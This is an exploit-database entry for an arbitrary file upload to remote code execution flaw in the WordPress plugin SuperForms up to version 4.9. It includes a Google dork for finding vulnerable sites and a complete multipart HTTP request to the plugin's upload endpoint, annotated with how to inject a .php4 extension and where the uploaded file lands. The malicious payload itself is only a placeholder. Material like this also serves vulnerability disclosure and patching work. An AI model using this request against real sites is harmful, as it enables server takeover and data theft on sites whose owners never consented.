WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution

vendor:

WordPress Plugin SuperForms

by:

ABDO10

7.5

CVSS

HIGH

Arbitrary File Upload to Remote Code Execution

Not specified

CWE

Product Name: WordPress Plugin SuperForms

Affected Version From: All versions up to and including 4.9.X

Affected Version To: 4.9.X

Patch Exists: NO

Related CWE: Not specified

CPE: Not specified

Metasploit:

Other Scripts:

Platforms Tested:

2021

WordPress Plugin SuperForms 4.9 – Arbitrary File Upload to Remote Code Execution

The WordPress Plugin SuperForms version 4.9 allows arbitrary file upload, leading to remote code execution. An attacker can upload a malicious file with a .php4 extension to execute arbitrary code on the server. The file can be found in the /wp-content/uploads/superforms/2021/01/<id>/filename.php4 directory, where <id> can be obtained from the server reply.

Mitigation:

Update to a version higher than 4.9.X to fix the vulnerability. Remove any unnecessary or unused plugins.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution
# Exploit Author: ABDO10
# Date : Jan - 28 - 2021
# Google Dork : inurl:"/wp-content/plugins/super-forms/"
# Vendor Homepage : https://renstillmann.github.io/super-forms/#/
# Version : All (<= 4.9.X)
# data in http request :

POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1
 <=== exploit end point
Host: localhost
User-Agent: UserAgent
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------423513681827540048931513055996
Content-Length: 7058
Origin: localhost
Connection: close
Referer: localhost
Cookie: 

-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="accept_file_types"

jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF                        <=======
inject extension (|PHP4) to validate file to upload
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="max_file_size"

8000000
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="image_library"

0
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="files[]";
filename="filename.(extension)"    <====   inject code extension (.php4)
for example
Content-Type: application/pdf

Evil codes to be uploaded

-----------------------------423513681827540048931513055996--

# Uploaded Malicious File can  be Found in :
/wp-content/uploads/superforms/2021/01/<id>/filename.php4
u can get <id> from server reply .